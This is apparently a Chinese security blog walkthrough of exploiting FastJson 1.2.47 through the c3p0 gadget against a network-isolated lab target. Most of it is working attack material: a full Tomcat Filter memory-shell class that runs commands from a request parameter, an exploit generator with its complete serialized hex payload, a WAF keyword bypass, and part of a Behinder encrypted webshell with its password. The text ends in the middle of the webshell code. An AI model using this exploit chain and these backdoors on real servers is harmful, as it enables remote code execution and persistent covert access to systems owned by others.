FastJson不出网的利用
2025-11-01 20:59:04 #Java #FastJson # Web安全

简介

现实环境中可能会遇到fastjson不出网的情况,下面打两个不出网的靶场[1]

fastjson1.2.47结合c3p0绕waf,不出网环境

这个环境比较特殊,docker起的两台机器,构造的机器不出网环境。

还是一样,首先就是探测具体版本。

1
{"@type":"java.lang.AutoCloseable"

image-20251025151245499

版本1.2.47。这个漏洞爆出版本为1.2.47,在这个版本及以下fastjosn存在mappings缓存通杀绕过,利用的方式为JNDI,但不要忘了JNDI的利用是有一定条件的

1、一般需要出网环境。

2、受到JDK版本限制,JDK8u191后受到trusturlcodebase限制远程加载,但也有绕过方法。

这里因为机器不出网,JNDI注入并不太适合,所以需要找其他方法。

因此下一步探测存在的依赖。利用Character转换报错可以判断存在何种依赖。

1
2
3
4
5
6
7
{
  "x": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "org.springframework.web.bind.annotation.RequestMapping"
		}
	}

报错如下,RequestMapping本身为SpringBoot下的类,当存在该类时会报出类型转换错误,说明为SpringBoot项目。

image-20251025193804424

否则无显示。

image-20251025194100225

因此,通过这种方法结合已知的fastjson利用链POC所需的依赖类,最终探测服务中存在C3P0依赖com.mchange.v2.c3p0.DataSources)。

image-20251025194357111

fastjson本身结合c3p0有很多利用方式,其中提到最多的是不出网利用,hex base二次反序列化打内存马。在c3p0+fastjson利用其他文章中介绍的是需要依赖像cc链这样的反序列化链,但其实是不需要的,因为fastjson全版本都存在原生反序列化漏洞[2],且是通过TemplatesImpl加载类,很适合打内存马。

不出网打普通内存马

先找一个普通的内存马:Tomcat的Filter型内存马[3],但是直接引用是不行的,c3p0二次反序列化环境中,如果针对不出网机器,需要使用的是TemplatesImpl这条链加载恶意字节码。但是对于使用TemplatesImpl,需要在恶意类中继承AbstractTranslet,并重写他的两个方法,否则该类无法被加载。更改后的内存马如下:Fain.java,要编译为class文件。就是在原来代码的基础上extends AbstractTranslet,然后重写AbstractTranslettransform,在下面代码的最后,是重写的两个方法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Map;

public class FRain extends AbstractTranslet implements Filter{

    static{
        try{
            final String name = "AutomneGreet";
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            Map filterConfigs = (Map) Configs.get(standardContext);

            if (filterConfigs.get(name) == null){
                Filter filter = new FRain();

                FilterDef filterDef = new FilterDef();
                filterDef.setFilter(filter);
                filterDef.setFilterName(name);
                filterDef.setFilterClass(filter.getClass().getName());

                standardContext.addFilterDef(filterDef);

                FilterMap filterMap = new FilterMap();
                filterMap.addURLPattern("/*");
                filterMap.setFilterName(name);
                filterMap.setDispatcher(DispatcherType.REQUEST.name());

                standardContext.addFilterMapBefore(filterMap);

                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
                constructor.setAccessible(true);
                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

                filterConfigs.put(name,filterConfig);
            }
        }catch (Exception hi){
            //hi.printStackTrace();
        }
    }

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {

    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) servletRequest;
        if (req.getParameter("chan") != null){
            Process process = Runtime.getRuntime().exec(req.getParameter("chan"));
            java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                    new java.io.InputStreamReader(process.getInputStream()));
            StringBuilder stringBuilder = new StringBuilder();
            String line;
            while ((line = bufferedReader.readLine()) != null) {
                stringBuilder.append(line + '\n');
            }
            servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
            servletResponse.getOutputStream().flush();
            servletResponse.getOutputStream().close();
            return;
        }
        filterChain.doFilter(servletRequest,servletResponse);
    }

    @Override
    public void destroy() {

    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

依赖如下:

1
2
3
4
5
6
7
8
9
10
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.47</version>
</dependency>
<dependency>
    <groupId>com.mchange</groupId>
    <artifactId>c3p0</artifactId>
    <version>0.9.5.2</version>
</dependency>

之后就是关于C3P0二次反序列这条链,细节就不说了,与之前唯一个区别是之前使用的CC6那条反序列化链,但是其实fastjson全版本都存在类似CC这样的原生反序列化链漏洞,就不在需要对方环境中存在CC这样的依赖。 最终exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;

public class Test {
    public static void main(String[] args) throws Exception {
        String hex2 = bytesToHex(tobyteArray(gen()));
        String FJ1247 = "{\n" +
                "    \"a\":{\n" +
                "        \"@type\":\"java.lang.Class\",\n" +
                "        \"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +
                "    },\n" +
                "    \"b\":{\n" +
                "        \"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +
                "        \"userOverridesAsString\":\"HexAsciiSerializedMap:" + hex2 + ";\",\n" +
                "    }\n" +
                "}\n";
        System.out.println(FJ1247);
    }
    //FastJson原生反序列化加载恶意类字节码
    public static Object gen() throws Exception {
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        byte[] bytes = Files.readAllBytes(Paths.get("/Users/xxxxx/History_vuls/FastJsonParty/fastjson-c3p0-no-network/target/classes/FRain.class")); //换成恶意类的路径
        setValue(templates, "_bytecodes", new byte[][]{bytes});
        setValue(templates, "_name", "1");
        setValue(templates, "_tfactory", null);

        JSONArray jsonArray = new JSONArray();
        jsonArray.add(templates);

        BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
        setValue(bd,"val",jsonArray);

        HashMap hashMap = new HashMap();
        hashMap.put(templates,bd);
        return hashMap;
    }
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    //将类序列化为字节数组
    public static byte[] tobyteArray(Object o) throws IOException {
        ByteArrayOutputStream bao = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bao);
        oos.writeObject(o);   //
        return bao.toByteArray();
    }

    //字节数组转十六进制
    public static String bytesToHex(byte[] bytes) {
        StringBuffer stringBuffer = new StringBuffer();
        for (int i = 0; i < bytes.length; i++) {
            String hex = Integer.toHexString(bytes[i] & 0xff);      //bytes[]中为带符号字节-255~+255,&0xff: 保证得到的数据在0~255之间
            if (hex.length()<2){
                stringBuffer.append("0" + hex);   //0-9 则在前面加‘0’,保证2位避免后面读取错误
            }else {
                stringBuffer.append(hex);
            }
        }
        return stringBuffer.toString();
    }
}

运行Test.java,运行的结果如下:

1
2
3
4
5
6
7
8
9
10
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
    },
    "b":{
        "@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
        "userOverridesAsString":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e002000078700000183acafebabe0000003401270a004300920700930800940b000200950a009600970a0096009807009907009a0a009b009c0a0008009d0a0007009e07009f0a000c00920a000700a00a000c00a10a000c00a20a000c00a30b00a400a50a00a600a70a00a800a90a00a800aa0a00a800ab0b00ac00ad0800ae0a00af00b00a00af00b10700b20a001b00b30b00b400b50700b60800b70a003b00b808008d0a003b00b90a00ba00bb0a00ba00bc0700bd0b002500bc0700be0a002700920700bf0a002900920a002900c00a002900c10a003f00c20a003b00c30a002900c40a001e00c50700c60a003100920800c70a003100c80a003100c10900c900ca0a00c900cb0a003100cc0a001e00cd0700ce0700cf0700d00a003b00d10a00d200bb0700d30a00d200d40b002500d50700d60700d70700d80100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100074c465261696e3b010004696e697401001f284c6a617661782f736572766c65742f46696c746572436f6e6669673b295601000c66696c746572436f6e66696701001c4c6a617661782f736572766c65742f46696c746572436f6e6669673b01000a457863657074696f6e730700d9010008646f46696c74657201005b284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b4c6a617661782f736572766c65742f46696c746572436861696e3b295601000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000e62756666657265645265616465720100184c6a6176612f696f2f42756666657265645265616465723b01000d737472696e674275696c6465720100194c6a6176612f6c616e672f537472696e674275696c6465723b0100046c696e650100124c6a6176612f6c616e672f537472696e673b01000e736572766c65745265717565737401001e4c6a617661782f736572766c65742f536572766c6574526571756573743b01000f736572766c6574526573706f6e736501001f4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b01000b66696c746572436861696e01001b4c6a617661782f736572766c65742f46696c746572436861696e3b0100037265710100274c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b01000d537461636b4d61705461626c650700be0700da0700db0700dc0700930700dd07009907009f0700de0700df01000764657374726f790100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0700e00100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e01000666696c7465720100164c6a617661782f736572766c65742f46696c7465723b01000966696c7465724465660100314c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b01000966696c7465724d61700100314c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b01000b636f6e7374727563746f7201001f4c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b0100324c6f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e6669673b0100046e616d65010015776562617070436c6173734c6f61646572426173650100324c6f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173653b01000f7374616e64617264436f6e7465787401002a4c6f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578743b010007436f6e666967730100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d66696c746572436f6e6669677301000f4c6a6176612f7574696c2f4d61703b0700d601000a536f7572636546696c6501000a465261696e2e6a6176610c004500460100256a617661782f736572766c65742f687474702f48747470536572766c6574526571756573740100046368616e0c00e100e20700e30c00e400e50c00e600e70100166a6176612f696f2f42756666657265645265616465720100196a6176612f696f2f496e70757453747265616d5265616465720700dd0c00e800e90c004500ea0c004500eb0100176a6176612f6c616e672f537472696e674275696c6465720c00ec00ed0c00ee00ef0c00ee00f00c00f100ed0700db0c00f200f30700de0c00f400f50700f60c00f700f80c00f900460c00fa00460700dc0c005200fb01000c4175746f6d6e6547726565740700fc0c00fd00fe0c00ff01000100306f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173650c010101020701030c010401050100286f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578740100286f72672e6170616368652e636174616c696e612e636f72652e5374616e64617264436f6e746578740c010601070c0108010907010a0c010b010c0c010d010e01000d6a6176612f7574696c2f4d6170010005465261696e01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465660c010f01100c011101120c011301140c011500ed0c011601120c0117011801002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61700100022f2a0c0119011207011a0c011b011c0c008600ed0c011d01120c011e011f0100306f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e66696701000f6a6176612f6c616e672f436c61737301001b6f72672f6170616368652f636174616c696e612f436f6e746578740c012001210701220100106a6176612f6c616e672f4f626a6563740c012301240c012501260100136a6176612f6c616e672f457863657074696f6e010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a617661782f736572766c65742f46696c74657201001e6a617661782f736572766c65742f536572766c6574457863657074696f6e01001c6a617661782f736572766c65742f536572766c65745265717565737401001d6a617661782f736572766c65742f536572766c6574526573706f6e73650100196a617661782f736572766c65742f46696c746572436861696e0100116a6176612f6c616e672f50726f636573730100106a6176612f6c616e672f537472696e670100136a6176612f696f2f494f457863657074696f6e010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000c676574506172616d65746572010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b2956010013284c6a6176612f696f2f5265616465723b2956010008726561644c696e6501001428294c6a6176612f6c616e672f537472696e673b010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b01001c2843294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e6701000f6765744f757470757453747265616d01002528294c6a617661782f736572766c65742f536572766c65744f757470757453747265616d3b010008676574427974657301000428295b420100216a617661782f736572766c65742f536572766c65744f757470757453747265616d0100057772697465010005285b422956010005666c757368010005636c6f7365010040284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b29560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010015676574436f6e74657874436c6173734c6f6164657201001928294c6a6176612f6c616e672f436c6173734c6f616465723b01000c6765745265736f757263657301002728294c6f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f743b0100236f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f7401000a676574436f6e7465787401001f28294c6f72672f6170616368652f636174616c696e612f436f6e746578743b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000973657446696c746572010019284c6a617661782f736572766c65742f46696c7465723b295601000d73657446696c7465724e616d65010015284c6a6176612f6c616e672f537472696e673b2956010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501000e73657446696c746572436c61737301000c61646446696c746572446566010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b295601000d61646455524c5061747465726e01001c6a617661782f736572766c65742f44697370617463686572547970650100075245515545535401001e4c6a617661782f736572766c65742f44697370617463686572547970653b01000d7365744469737061746368657201001261646446696c7465724d61704265666f7265010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b29560100166765744465636c61726564436f6e7374727563746f72010033285b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b01001d6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f7201000b6e6577496e7374616e6365010027285b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b010003707574010038284c6a6176612f6c616e672f4f626a6563743b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0021002700430001004400000007000100450046000100470000002f00010001000000052ab70001b10000000200480000000600010000001400490000000c000100000005004a004b00000001004c004d00020047000000350000000200000001b10000000200480000000600010000003f004900000016000200000001004a004b000000000001004e004f000100500000000400010051000100520053000200470000018700050009000000962bc000023a0419041203b900040200c6007eb8000519041203b900040200b600063a05bb000759bb0008591905b60009b7000ab7000b3a06bb000c59b7000d3a071906b6000e593a08c600201907bb000c59b7000d1908b6000f100ab60010b60011b6000f57a7ffdb2cb9001201001907b60011b60013b600142cb900120100b600152cb900120100b60016b12d2b2cb900170300b10000000300480000003a000e00000043000600440012004500230046002d0047003800480041004a004c004b0069004d007a004e0083004f008c0050008d00520095005300490000005c00090023006a005400550005003800550056005700060041004c00580059000700490044005a005b000800000096004a004b000000000096005c005d000100000096005e005f0002000000960060006100030006009000620063000400640000003d0003ff0041000807006507006607006707006807006907006a07006b07006c0000fc002707006dff0023000507006507006607006707006807006900000050000000060002006e00510001006f0046000100470000002b0000000100000001b10000000200480000000600010000005800490000000c000100000001004a004b0000000100700071000200470000003f0000000300000001b10000000200480000000600010000005d004900000020000300000001004a004b000000000001007200730001000000010074007500020050000000040001007600010070007700020047000000490000000400000001b10000000200480000000600010000006200490000002a000400000001004a004b0000000000010072007300010000000100780079000200000001007a007b0003005000000004000100760008007c004600010047000001da0005000a000000de12184bb80019b6001ac0001b4c2bb6001cb9001d0100c0001e4d121fb800201221b600224e2d04b600232d2cb60024c000253a0419041218b900260200c7009cbb002759b700283a05bb002959b7002a3a0619061905b6002b19061218b6002c19061905b6002db6002eb6002f2c1906b60030bb003159b700323a0719071233b6003419071218b600351907b20036b60037b600382c1907b60039123a05bd003b5903123c535904122953b6003d3a08190804b6003e190805bd003f59032c535904190653b60040c0003a3a09190412181909b90041030057a700044bb10001000000d900dc0042000300480000006600190000001800030019000d001a001a001c0025001d002a001e003400200040002100490023005200240059002500600026006d00280073002a007c002b0083002c008a002d0095002f009b003100b0003200b6003300cd003500d9003900dc003700dd003a004900000066000a00490090007d007e000500520087007f00800006007c005d00810082000700b0002900830084000800cd000c004e00850009000300d60086005b0000000d00cc008700880001001a00bf0089008a0002002500b4008b008c0003003400a5008d008e000400640000000a0003fb00d94207008f0000010090000000020091707400013170770100787372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00055b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0014707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000027372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000002774000454657374740009546573742e6a61766174000367656e7371007e00170000000f71007e001971007e001a7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00137872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e0023787372001e636f6d2e616c69626162612e666173746a736f6e2e4a534f4e417272617900000000000000010200014c00046c69737471007e001378707371007e00220000000177040000000171007e00077878;",
    }
}

被拦截了,尝试发现是过滤了userOverridesAsString,尝试unicode、hex编码绕过依然不行,代码中过滤了\u,\x等编码前缀。

image-20251029121213558

参考Y4tacker的文章[4],还可以添加_+关键字绕过。

image-20251029121253462

成了。测试一下内存马是否打成功。

image-20251029121346029

不出网打冰蝎内存马

冰蝎内存马和普通的内存马一样,就是在这个冰蝎内存马的基础上[5],再实现extends AbstractTranslet,然后重写AbstractTranslettransform

代码RcememShell.java如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
// 冰蝎的密码为:goautomne
public class RcememShell extends AbstractTranslet implements Filter{
    private final String pa = "3ad2fddfe8bad8e6";

    static{
        try{
            final String name = "AutomneGreet";
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            Map filterConfigs = (Map) Configs.get(standardContext);

            if (filterConfigs.get(name) == null){
                Filter filter = new RcememShell();

                FilterDef filterDef = new FilterDef();
                filterDef.setFilter(filter);
                filterDef.setFilterName(name);
                filterDef.setFilterClass(filter.getClass().getName());

                standardContext.addFilterDef(filterDef);

                FilterMap filterMap = new FilterMap();
                filterMap.addURLPattern("/*");
                filterMap.setFilterName(name);
                filterMap.setDispatcher(DispatcherType.REQUEST.name());

                standardContext.addFilterMapBefore(filterMap);

                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
                constructor.setAccessible(true);
                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

                filterConfigs.put(name,filterConfig);
            }
        }catch (Exception hi){
            //hi.printStackTrace();
        }
    }

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {

    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) servletRequest;
        HttpServletResponse response = (HttpServletResponse) servletResponse;
        HttpSession session = request.getSession();

        Map<String, Object> pageContext = new HashMap<String, Object>();
        pageContext.put("session", session);
        pageContext.put("request", request);
        pageContext.put("response", response);

        ClassLoader cl = (ClassLoader) Thread.currentThread().getContextClassLoader();

        if (request.getMethod().equals("POST")) {
            if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Class Lclass = cl.getClass().getSuperclass();
                RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Class Lclass = cl.getClass().getSuperclass().getSuperclass();
                RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass, cl, session, request, pageContext);
            } else {
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass, cl, session, request, pageContext);
            }
            filterChain.doFilter(servletRequest, servletResponse);
        }
    }

    @Override
    public void destroy() {

    }

    public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map<String, Object> pageContext){
        byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
        try {
